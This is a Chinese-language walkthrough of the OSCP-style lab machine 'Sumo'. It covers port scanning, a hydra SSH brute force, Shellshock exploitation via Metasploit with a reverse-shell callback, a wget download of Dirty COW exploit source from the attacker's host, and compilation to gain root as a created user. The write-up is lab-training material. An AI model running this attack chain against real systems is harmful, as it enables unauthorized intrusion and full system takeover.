OSCP系列靶场-Esay-Sumo

admin 2024年5月19日22:50:19评论46 views字数 4186阅读13分57秒阅读模式

本文由掌控安全学院- 杳若 投稿

总结

getwebshell : nikto扫描 → 发现shellshock漏洞 → 漏洞利用 → getwebshell

提 权 思 路 : 内网信息收集 → 内核版本较老 →脏牛提权

准备工作

  • 启动VPN
    获取攻击机IP → 192.168.45.194

  • 启动靶机
    获取目标机器IP → 192.168.190.87

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次(多次扫描减少误扫)

  1. sudo nmap --min-rate 10000-p-192.168.190.87
  2. PORT STATE SERVICE
  3. 22/tcp open ssh
  4. 80/tcp open http

开放的端口->22,80

目标端口对应服务探测


  1. # tcp探测
  2. sudo nmap -sT -sV -O -sC -p22,80192.168.190.87
  3. PORT STATE SERVICE VERSION
  4. 22/tcp open ssh OpenSSH5.9p1Debian5ubuntu1.10(Ubuntu
  5. 80/tcp open http Apache httpd 2.2.22((Ubuntu))

信息收集-端口测试

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用

通过Nmap探测获得SSH的版本信息,可以尝试利用
探测版本为OpenSSH 5.9p1 Debian 较老


  1. # 搜索对应脚本
  2. msf6 > searchsploit OpenSSH5.9p1

发现搜索到可利用的和用户枚举有关(待定)

22-SSH协议支持的登录方式

通过Nmap探测获得SSH的版本信息,在获取到某个用户名之后尝试


  1. sudo ssh root@192.168.190.87-v

显示publickeypassword就是支持密钥以及密码登录

22-SSH手动登录尝试(无)

因为支持密码登录,尝试root账户的密码弱密码尝试


  1. sudo ssh root@192.168.190.87-p 22
  2. # 密码尝试
  3. password > root

弱密码尝试失败

22-SSH弱口令爆破(静静等待)

因为支持密码登录,尝试root账户的密码爆破,利用工具hydra,线程-t为6


  1. sudo hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6-vV 192.168.190.87 ssh -s 22

挂着工具进行爆破,我们尝试后续信息收集

80-HTTP端口的信息收集

访问 http://192.168.190.87:80 不是CMS我们直接从HTML隐藏信息收集开始
提示是存在启动的应用,但是没显示

信息收集-HTML隐藏信息查看


  1. # 包括文章中是否写明一些敏感信息
  2. curl http://192.168.190.87:80

信息收集-目录扫描

信息收集-目录扫描初步

  1. # 用两个扫描器进行扫描,更加的谨慎一些
  2. dirsearch -u http://192.168.190.87:80 -x 302,403,404
  3. dirb http://192.168.190.87:80

没有扫出目录,准备大字典

信息收集-目录扫描(深度/大字典)

  1. gobuster dir -u http://192.168.190.87:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 1000

在进行大字典的时候,发现无事可干,尝试利用其他工具探测一下web

探测完毕,毫无头绪

漏洞探测-nikto扫描


  1. nikto -h http://192.168.190.87:80

探测之后提示似乎容易受到shellshock漏洞攻击CVE-2014-6278
似乎与首页的提示存在启动的应用有关

漏洞利用-getwebshell


  1. Shellshock漏洞于20149月公开,并且对网络安全造成了相当大的影响。这个漏洞的本质是Bash解释器在处理环境变量时存在一种缺陷,允许远程攻击者通过精心构造的恶意环境变量注入任意的Shell命令,从而实现执行恶意代码的能力。

Shellshock攻击

使用msfconsole,搜索攻击方式


  1. msfconsole
  2. search CVE-2014-6271

在这里选择了1因为探测出来是apache的站点,1比2更靠谱
使用msf漏洞利用模块:exploit(multi/http/apache_mod_cgi_bash_env_exec)


  1. use exploit/multi/http/apache_mod_cgi_bash_env_exec
  2. set rhosts 192.168.190.87
  3. set lhost 192.168.45.194
  4. set targeturi /cgi-bin/test
  5. run

成功getwebshell

内网遨游-getshell

交互shell

交互shell-python

由于获取的shell交互不友好,利用python获得新的交互shell


  1. # 如果是msf的要先shell
  2. shell
  3. # 利用python获取交互shell -> python失败使用python3
  4. python -c "import pty;pty.spawn('/bin/bash')";

FLAG1获取


  1. www-data@ubuntu:/usr/lib/cgi-bin$ find /-name local.txt 2>/dev/null
  2. /usr/lib/cgi-bin/local.txt
  3. www-data@ubuntu:/usr/lib/cgi-bin$ cat /usr/lib/cgi-bin/local.txt
  4. 6b8bdd93e00d8ea52fcc7f201eba9f56

信息收集-内网基础信息收集

提权的本质在于枚举,在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测Linux操作系统的发行版本

较老的Ubuntu以及Linux系统可以overlayfs提权


  1. # 确定发行版本
  2. www-data@ubuntu:/usr/lib/cgi-bin$ lsb_release -a
  3. No LSB modules are available.
  4. Distributor ID:Ubuntu
  5. Description:Ubuntu12.04 LTS
  6. Release:12.04
  7. Codename: precise

发行版本为Ubuntu 12.04,有点能overlayfs提权

检测Linux操作系统的内核版本

较低的内核版本可以进行脏牛提权


  1. www-data@ubuntu:/usr/lib/cgi-bin$ uname -a
  2. Linux ubuntu 3.2.0-23-generic#36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

内核版本为3.2.0

权限提升

overlayfs提权(无)

若存在以下情况进行overlayfsLinux Kernel Version提权

系统 版本
Linux Kernel Version 大于3.13.0小于3.19
Ubuntu Linux 15.04
Ubuntu Linux 14.10
Ubuntu Linux 14.10
Ubuntu Linux 12.04

  1. msfcontrol
  2. msf > searchsploit overlayfs

发现内核版本不太符合

脏牛提权尝试1(失败)

若存在以下情况进行脏牛提权

系统 版本
Centos7/RHEL7 3.10 .0-327.36.3.e17
Cetnos6/RHEL6 4.4.0-45.66
Ubuntu 16.10 2.6.32-642 .6.2.e16
Ubuntu 16.04 4.8.0-26.28
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1

  1. msf6 > searchsploit dirty


  1. # cp到本地
  2. cp /usr/share/exploitdb/exploits/linux/local/40847.cpp.
  3. # 确认编译语句
  4. cat 40847.cpp

得到编译以及执行的语句


  1. g++-Wall-pedantic -O2 -std=c++11-pthread -o dcow 40847.cpp-lutil
  2. ./dcow -s
python3开启http服务

  1. # 利用python开启http服务,方便目标机器上下载文件
  2. sudo python3 -m http.server 80

  1. # 目标机器到tmp目录下下载(有下载权限)
  2. cd /tmp
  3. # 下载
  4. wget http://192.168.45.194/40847.cpp
  5. # 给权限
  6. chmod +x 40847.cpp
  7. # 编译
  8. g++-Wall-pedantic -O2 -std=c++11-pthread -o dcow 40847.cpp-lutil
  9. # 运行
  10. ./dcow -s

发现不能用`g++``

脏牛提权尝试2

尝试换一个


  1. # cp到本地
  2. cp /usr/share/exploitdb/exploits/linux/local/40839.c.
  3. # 确认编译语句
  4. cat linux/local/40839.c


  1. gcc -pthread dirty.c -o dirty -lcrypt
  2. 创建firefart用户,密码自输
python3开启http服务

  1. # 利用python开启http服务,方便目标机器上下载文件
  2. sudo python3 -m http.server 80

  1. # 目标机器到tmp目录下下载(有下载权限)
  2. cd /tmp
  3. # 下载
  4. wget http://192.168.45.194/40839.c
  5. # 给权限
  6. chmod +x 40839.c
  7. # 编译
  8. gcc -pthread 40839.c-o dirty -lcrypt
  9. # 运行
  10. ./dirty


  1. # 重新登录su firefart用户密码123456
  2. www-data@ubuntu:/usr/lib/cgi-bin$ su firefart
  3. Password:123456
  4. firefart@ubuntu:/usr/lib/cgi-bin# id
  5. uid=0(firefart) gid=0(root) groups=0(root)

提权成功

FLAG2获取


  1. firefart@ubuntu:/tmp# cat /root/proof.txt
  2. 22f3656d21fb5ef444ea898e69073476

总结

从发现ssh版本开始就感觉有点偏老,应该多尝试老漏洞

有时候nikto工具也可以适当用一下,指不定有其他收获

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日22:50:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP系列靶场-Esay-Sumohttp://cn-sec.com/archives/2018721.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息